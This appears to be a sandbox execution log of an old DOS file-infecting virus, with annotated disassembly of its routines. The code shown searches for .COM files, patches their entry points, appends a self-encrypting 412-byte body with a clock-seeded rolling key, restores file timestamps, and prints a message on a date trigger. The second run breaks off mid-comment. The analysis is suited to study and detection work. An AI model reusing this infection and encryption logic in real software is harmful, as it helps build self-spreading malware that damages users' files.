Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Sugar.416


Syscalls:

Time Syscall Op Syscall Name
; Linear disassembly of the bytes that follow the return address of the logged
; "Get date" call (op 42 = INT 21h/AH=2Ah). It lists what sits in memory after
; that address, not only the path that executed. No "Change current directory"
; record appears in this run, so the AL == 4 branch was not taken here.
2018-12-17T22:19:55.688473939Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (0 = Sunday), so 4 = Thursday
0x12a7f: jne 0x12a8d  ; any other weekday: skip the directory change
0x12a81: call 0x12a84  ; call to the next instruction: pushes its own address (position-independent addressing)
0x12a84: pop dx  ; DX = offset of 0x12a84 as loaded at run time
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, the path argument (data bytes are not shown in this trace)
0x12a89: mov ah, 0x3b  ; AH=3Bh: change current directory
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; attribute mask 0: no hidden/system/directory entries
0x12a91: call 0x12a94  ; same call/pop idiom
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search mask; the Open file records in this run all name .COM files
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; carry set = nothing matched: take the exit path
0x12a9d: call 0x12ac2  ; per-file routine; the open/read/seek/write records that follow carry PCs inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit path once find first/next reports no more files
0x12aa6: mov ah, 0x4f  ; AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; no more matches: exit path
2018-12-17T22:19:55.69054162Z 78 PC: 12a9b | Find first file
2018-12-17T22:19:55.694357266Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:55.698481947Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.702852329Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.703836907Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.705443022Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.706481884Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Linear disassembly after the logged "Get time" call (op 44 = INT 21h/AH=2Ch,
; which returns DH = seconds). The code prepares the 0x19c (412) byte buffer
; that the next log record writes to the open file: the first 0x26 bytes are
; copied unchanged, the remaining 0x176 bytes are transformed with a rolling
; additive key. Key and step are re-derived for every file, so only the
; unchanged 0x26-byte prefix can be expected to repeat across written copies.
; SI, DI and BX are set up before this excerpt and are not shown.
2018-12-17T22:19:55.70838753Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds field of the time just read
0x12b47: add ah, byte ptr [bx]  ; mix in the byte kept at [BX]
0x12b49: mov byte ptr [bx], ah  ; store back: [BX] now holds the start key for this copy
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): DS:0x9a would be the file-size low byte if the DTA is still at PSP:80h (80h + 1Ah) - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the step odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; [BX+1] holds the key step for this copy
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 0x26 (38) bytes copied as-is
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; CX = 0x176 (374) bytes still to process
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; output byte = input byte + current key
0x12b66: add ah, dl  ; key advances by the step after every byte
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer handed to the write call
0x12b6f: mov cx, 0x19c  ; 412 bytes, matching the Write record that follows
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.71018957Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.723684632Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.725539221Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.733385552Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.735988409Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:19:55.742814221Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.749229452Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.750667506Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.754152739Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.755766031Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as PRINT.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.758447159Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.761297035Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.763964403Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.765510179Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.773658006Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.776670573Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:19:55.783615018Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.79148444Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.793603957Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.796672828Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.798813322Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as HELLO.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.801541651Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.803595195Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.806975206Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.808454127Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.815954347Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.818498948Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:19:55.825155714Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.831540409Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.833075331Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.836418225Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.837839512Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as PHANG.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.840340505Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.843200235Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.845657103Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.847237453Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.857515913Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.860091947Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:19:55.866493265Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.873041072Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.875504373Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.878451572Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.881030434Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as PRINTA~1.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.88401088Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.886495541Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.890069267Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.891817643Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.899212367Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.902624523Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:19:55.909243719Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.914798442Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.916566321Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.918420749Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.919507926Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as MANDEL.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.921907758Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.923782378Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.928873818Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.930800952Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.935792597Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.937578867Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:19:55.94224163Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.946807559Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.947853051Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.950896075Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.952340002Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Same listing the trace prints after every "Get time" call in this run, here
; for the file opened as PAH.COM: clock-seeded key in AH, odd step in DL,
; 0x26 bytes copied unchanged, then 0x176 bytes emitted as (byte + key) with
; key += step. Linear disassembly; register setup before 0x12b45 is not shown.
2018-12-17T22:19:55.954996113Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds from Get time (INT 21h/AH=2Ch)
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah  ; updated start key stored at [BX]
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): looks like the default-DTA file-size byte - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; step forced odd
0x12b55: mov byte ptr [bx + 1], dl  ; updated step stored at [BX+1]
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; 0x26-byte prefix copied unchanged
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 0x176 bytes remain
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte + key
0x12b66: add ah, dl  ; key += step
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; buffer address for the write
0x12b6f: mov cx, 0x19c  ; 412 bytes, as in the next Write record
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-17T22:19:55.957497939Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.960660388Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.962009153Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.966894062Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.971099602Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:19:55.975224267Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.977269261Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.979013921Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.983771794Z 79 PC: 12aaa | Find next file
; Linear disassembly after the second logged "Get date" call (INT 21h/AH=2Ah
; returns DL = day of month). Date-triggered message: printed only on day 14.
2018-12-17T22:19:55.986832829Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe  ; day of month == 14?
0x12bb1: jne 0x12bbf  ; any other day: return without output
0x12bb3: call 0x12bb6  ; call/pop to obtain the run-time address
0x12bb6: pop dx
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the dollar-terminated string
0x12bbb: mov ah, 9  ; AH=09h: print string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; From 0x12bc0 on the bytes are the message data DX points to, decoded as if
; they were instructions; they are not code. The two-byte spans at 0x12bc2 and
; 0x12bc7 for one-byte opcodes fit a prefix byte folded into the mnemonic.
; Re-encoding the mnemonics gives printable ASCII, most likely "[C6H12O6] " up
; to the $ terminator at 0x12bca, then a zero byte and text that begins
; "Blood Su" - verify against a hex dump of the sample.
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-17T22:19:55.989892054Z 76 PC: 12a44 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Linear disassembly of the bytes that follow the return address of the logged
; "Get date" call (op 42 = INT 21h/AH=2Ah). It lists what sits in memory after
; that address, not only the path that executed. No "Change current directory"
; record appears in this run, so the AL == 4 branch was not taken here.
2018-12-25T11:49:13.733499363Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (0 = Sunday), so 4 = Thursday
0x12a7f: jne 0x12a8d  ; any other weekday: skip the directory change
0x12a81: call 0x12a84  ; call to the next instruction: pushes its own address (position-independent addressing)
0x12a84: pop dx  ; DX = offset of 0x12a84 as loaded at run time
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, the path argument (data bytes are not shown in this trace)
0x12a89: mov ah, 0x3b  ; AH=3Bh: change current directory
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; attribute mask 0: no hidden/system/directory entries
0x12a91: call 0x12a94  ; same call/pop idiom
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search mask (data bytes are not shown in this trace)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; carry set = nothing matched: take the exit path
0x12a9d: call 0x12ac2  ; per-file routine; the open/read/seek/write records that follow carry PCs inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit path once find first/next reports no more files
0x12aa6: mov ah, 0x4f  ; AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; no more matches: exit path
2018-12-25T11:49:13.739732093Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.749884422Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.759246127Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.767501695Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.77353088Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.776416966Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.777892513Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Linear disassembly after the logged "Get time" call (op 44 = INT 21h/AH=2Ch,
; which returns DH = seconds). The code prepares the 0x19c (412) byte buffer
; that the next log record writes to the open file: the first 0x26 bytes are
; copied unchanged, the remaining 0x176 bytes are transformed with a rolling
; additive key. Key and step are re-derived for every file, so only the
; unchanged 0x26-byte prefix can be expected to repeat across written copies.
; SI, DI and BX are set up before this excerpt and are not shown.
2018-12-25T11:49:13.782601735Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; AH = seconds field of the time just read
0x12b47: add ah, byte ptr [bx]  ; mix in the byte kept at [BX]
0x12b49: mov byte ptr [bx], ah  ; store back: [BX] now holds the start key for this copy
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): DS:0x9a would be the file-size low byte if the DTA is still at PSP:80h (80h + 1Ah) - confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the step odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; [BX+1] holds the key step for this copy
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 0x26 (38) bytes copied as-is
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; CX = 0x176 (374) bytes still to process
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; output byte = input byte + current key
0x12b66: add ah, dl  ; key advances by the step after every byte
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer handed to the write call
0x12b6f: mov cx, 0x19c  ; 412 bytes, matching the Write record that follows
0x12b72: mov ah, 0x40  ; AH=40h: write to file handle
2018-12-25T11:49:13.785193693Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:13.801694564Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:13.812642826Z 62 PC: 12b87 | Close file
2018-12-25T11:49:13.822239666Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:13.825107207Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.833021307Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.841258292Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.842802672Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.84720832Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.848736606Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.851640185Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.85464351Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.857588694Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.859453802Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.869629355Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.873450458Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.88270206Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.89103427Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.893742782Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.896954952Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.898538849Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.902103598Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.904882357Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.908773226Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.912015001Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.926246931Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.929484482Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.937326209Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.94501691Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.946784531Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.949952831Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.951669855Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.954971975Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.95724423Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.960236652Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.961883528Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.969642198Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.973110884Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.980698295Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.988012133Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.990769121Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.994464731Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.996593622Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.000699542Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.003722102Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.006906431Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.009200514Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.018759306Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.022157821Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.030031842Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.038949262Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.041195162Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.045472165Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.048243997Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.051997706Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.055697599Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.066779627Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.068649186Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.075717907Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.079908572Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.088503189Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.095888388Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.098099473Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.101323365Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.10276897Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.105832059Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.10905465Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.112207843Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.113944032Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.122435964Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.125727921Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.133377144Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.137881008Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.139862946Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.147710834Z 79 PC: 12aaa | Find next file (See above)
; Linear disassembly after the second logged "Get date" call (INT 21h/AH=2Ah
; returns DL = day of month). Date-triggered message: printed only on day 14.
